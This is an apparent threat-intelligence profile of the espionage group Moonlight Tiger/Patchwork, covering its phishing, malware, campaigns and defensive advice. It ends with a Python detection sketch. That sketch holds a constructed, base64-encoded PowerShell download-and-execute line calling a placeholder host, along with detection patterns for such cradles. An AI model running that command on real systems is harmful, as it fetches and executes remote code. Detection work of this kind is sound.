Moonlight Tiger (APT-C-09, Patchwork, Dropping Elephant): India’s Silent Espionage Arm in the Digital Battlefield

Introduction

Moonlight Tiger, also known as APT-C-09, Patchwork, Dropping Elephant, and Monsoon, is a suspected Indian cyber-espionage group that has been active since at least 2015. This group consistently targets foreign policy, defense, and academic institutions across South and East Asia. This pattern suggests sophisticated intelligence gathering aligned with India’s strategic and geopolitical goals.

Unlike disruptors or financially motivated individuals, Moonlight Tiger operates like a state-affiliated espionage cell. Its campaigns include well-designed phishing schemes, politically themed traps, and custom backdoors mixed with public tools. Over nearly a decade, the group has quietly advanced from basic document attacks to multi-stage operations using cloud services, modular implants, and living-off-the-land techniques.

Identity and Motivation 

Analysts largely believe that Moonlight Tiger consists of actors based in India or linked to Indian strategic interests. The group appears to enhance intelligence-gathering that supports traditional human intelligence efforts. Its operational focus reflects India’s geopolitical issues, such as countering China and Pakistan and tracking developments in South Asian defense and policy.

The group’s main motivations include: 

1. Geopolitical Intelligence: Gathering strategic information from regional adversaries like China and Pakistan. 

2. Defense and Policy Surveillance: Monitoring changes in defense procurement, military evolution, and foreign policy think tanks. 

3. Regional Influence Operations: Observing diplomatic, academic, and research institutions that shape narratives around South Asian security. 

Moonlight Tiger’s operations often show opportunism paired with precision, aligning with significant policy events, bilateral meetings, or military exercises involving Indian interests.


Tactics, Techniques, and Procedures (TTPs) 

The group uses a mix of social engineering, malware development, and open-source tools to gain access to networks and maintain presence. 

1. Initial Access 

The primary way the group gets in is through spearphishing. Emails often impersonate trusted government, defense, or academic contacts. Attached documents exploit vulnerabilities in Microsoft Office (e.g., CVE-2017-0199, CVE-2018-0802) or use embedded macros to run PowerShell scripts. At the same time, Moonlight Tiger launches watering-hole attacks on websites visited by defense analysts and policy researchers.

2. Execution and Persistence 

After gaining access, the group maintains its presence through registry changes, scheduled tasks, and DLL side-loading. It often uses custom droppers that imitate legitimate Indian government or research files. Many of these droppers release malware like BADNEWS, Ragnatela, or open-source implants (Meterpreter, QuasarRAT) that are designed for stealth and flexibility. 

3. Command and Control (C2) 

Moonlight Tiger’s C2 setup relies heavily on HTTP/S communication channels hosted on compromised servers. The group prefers cloud-based platforms and public hosting providers for C2 staging, encrypting its traffic using SSL to avoid detection. PowerShell and Python scripts are frequently employed for dynamic payload delivery and data theft.

4. Malware and Tools 

The group’s custom toolkit combines unique and publicly available components: 

– BADNEWS: A longstanding backdoor that allows file theft and command execution. 

– Ragnatela: A modular RAT that includes anti-analysis features and encrypted C2 communication. 

– Meterpreter / QuasarRAT: Modified open-source tools for discreet remote access. 

– Java-based Implants: Occasionally used to target cross-platform environments in diplomatic and research networks. 

5. Exfiltration and Lateral Movement 

Moonlight Tiger uses legitimate cloud services and temporary file-sharing platforms for data theft. Credentials stolen through phishing are often reused to move within target environments. The group also uses batch scripts and PowerShell-based tools to scout valuable systems.

Notable Operations 

Moonlight Tiger’s campaigns highlight its long-term commitment to espionage and information dominance in South Asia. 

2016 – Dropping Elephant Campaign: One of the first publicly documented operations, targeting Chinese diplomatic and media organizations with harmful RTF documents. This marked the group’s entry into the wider APT field. 

2018 – Patchwork Expansion: Focused on Pakistani defense and foreign affairs bodies. Introduced the BADNEWS RAT, delivered through phishing emails disguised as academic research papers. 

2020 – Operation Monsoon: Expanded into Southeast Asia, using modular PowerShell scripts within fake Office templates related to defense cooperation. 

2023 – Orange Athos Campaign: Used watering-hole attacks on South Asian think tanks, infecting visitors with the Ragnatela backdoor. This operation showed better infrastructure management and encryption. 

2025 – Strategic Research Phishing Campaign: Targeted Chinese and Sri Lankan defense research centers with fake conference invitations and policy-themed traps. Analysts noted enhanced operational security, including rotating domains and PowerShell obfuscation. 

Each campaign highlights the group’s ability to adapt to new technologies and geopolitical shifts, ensuring its relevance in a competitive regional cyber environment.


Evolution and Organizational Behavior 

Moonlight Tiger’s technical maturity has advanced significantly since its initial appearances. The group’s growth mirrors the broader sophistication of India’s emerging cyber capabilities. Early operations depended on basic document exploits and simple RATs, while later campaigns included modular loaders, cloud infrastructure, and encrypted communications.

Recent intelligence indicates that the group may share infrastructure or resources with other Indian-linked entities, such as SideWinder or Confucius, though each has distinct tools and targeting patterns. This potential overlap suggests a semi-federated network of Indian APTs working towards loosely aligned intelligence goals. 

The group’s evolution can be divided into three phases: 

2015–2017: Basic spearphishing and static malware (Dropping Elephant phase). 

2018–2021: Shift to modular RATs and more organized infrastructure (Patchwork phase). 

2022–2025: Incorporation of living-off-the-land and cloud-based tactics, showing operational maturity (Moonlight Tiger phase).

Strategic Impact 

Moonlight Tiger’s ongoing espionage efforts illustrate India’s growing involvement in state-level cyber operations. While it is less visible than Chinese or Russian APTs, the group maintains a consistent, intelligence-driven approach focused on achieving strategic advantage through information superiority.

The effects of its operations reach beyond data theft: 

– Geopolitical Leverage: Intelligence gathered from regional adversaries aids policy planning and diplomatic strategy. 

– Technological Surveillance: Monitoring defense upgrades and military-industrial projects provides early warning capabilities. 

– Regional Influence: Disruption or exposure of foreign narratives via targeted leaks or influence campaigns. 

Moonlight Tiger’s focus on soft-power targets—universities, policy institutes, and NGOs—shows a deep understanding of information ecosystems in today’s era of hybrid warfare.

Defensive Takeaways 

1. Phishing Awareness: Provide solid training and multi-factor authentication to reduce credential theft. 

2. Network Segmentation: Stop lateral movement through internal isolation and continuous privilege checks. 

3. Behavioral Detection: Use endpoint detection and response tools to spot unusual PowerShell or network activity. 

4. Threat Intelligence Sharing: Regional cooperation among CERTs in Asia can help identify overlaps in Moonlight Tiger’s infrastructure.

5. Cloud Security Monitoring: Keep an eye on unusual outbound traffic to cloud platforms, which is a known theft vector for the group.
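As an added defensive example (not code from the original profile or from Brandefense), the following Python triage sketch applies takeaway 3 to the TTPs described above: it runs over constructed Sysmon-style process-creation records and flags PowerShell launched by an Office parent, encoded command lines, hidden windows, and download cradles, decoding -EncodedCommand payloads before inspection. The field names, file paths, and sample lines are assumptions built for the example.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line markers worth analyst attention: (regex over lowercased text, label).
MARKERS = [
    (r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop(?:rofile)?\b", "profile bypass"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
]

def _b64_utf16(cmd: str) -> str:
    # Helper used only to build the constructed samples below (PowerShell expects UTF-16LE).
    return base64.b64encode(cmd.encode("utf-16le")).decode()

# Constructed Sysmon-style process-creation records, one "key=value|key=value" line each.
SAMPLE_LOGS = [
    "ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -EncodedCommand "
    + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"),
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -File C:\\Scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -EncodedCommand " + _b64_utf16("Get-Date"),
]

def parse_record(line: str) -> dict:
    return dict(field.split("=", 1) for field in line.split("|"))

def decode_encoded_command(cmdline: str) -> str:
    # Return the decoded -EncodedCommand payload, or '' when absent or undecodable.
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return ""

def score_record(rec: dict) -> list:
    # Reasons a PowerShell process-creation record deserves a second look.
    image = rec.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in PS_IMAGES:
        return []
    parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if parent in OFFICE_PARENTS:  # macro-launched PowerShell, as in the initial-access TTP
        reasons.append(f"powershell spawned by Office process {parent}")
    cmd = rec.get("CommandLine", "")
    text = (cmd + " " + decode_encoded_command(cmd)).lower()  # inspect the decoded payload too
    reasons += [f"command-line marker: {label}" for rx, label in MARKERS if re.search(rx, text)]
    return reasons

def triage(lines: list) -> list:
    # (index, reasons) for every record that raised at least one reason.
    flagged = []
    for i, line in enumerate(lines):
        reasons = score_record(parse_record(line))
        if reasons:
            flagged.append((i, reasons))
    return flagged
```

Of the three constructed records, only the Office-spawned encoded cradle and the bare encoded command are flagged; the scheduled backup script passes untouched.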

Conclusion

Moonlight Tiger (APT-C-09) represents the evolution of India’s cyber-espionage landscape: methodical, adaptable, and geopolitically focused. Its operations show an intelligence service increasingly skilled at merging traditional espionage goals with modern cyber strategies. By combining the precision of spearphishing with modular malware design, the group continues to infiltrate sensitive networks across Asia with relative stealth.

As of 2025, Moonlight Tiger remains active and evolving. Its path suggests ongoing investment in cyber capabilities aimed at securing India’s regional strategic dominance. For defenders and policymakers, the group serves as a reminder that the future of espionage is no longer limited to embassies and boardrooms but occurs within the unseen circuits of cyberspace.
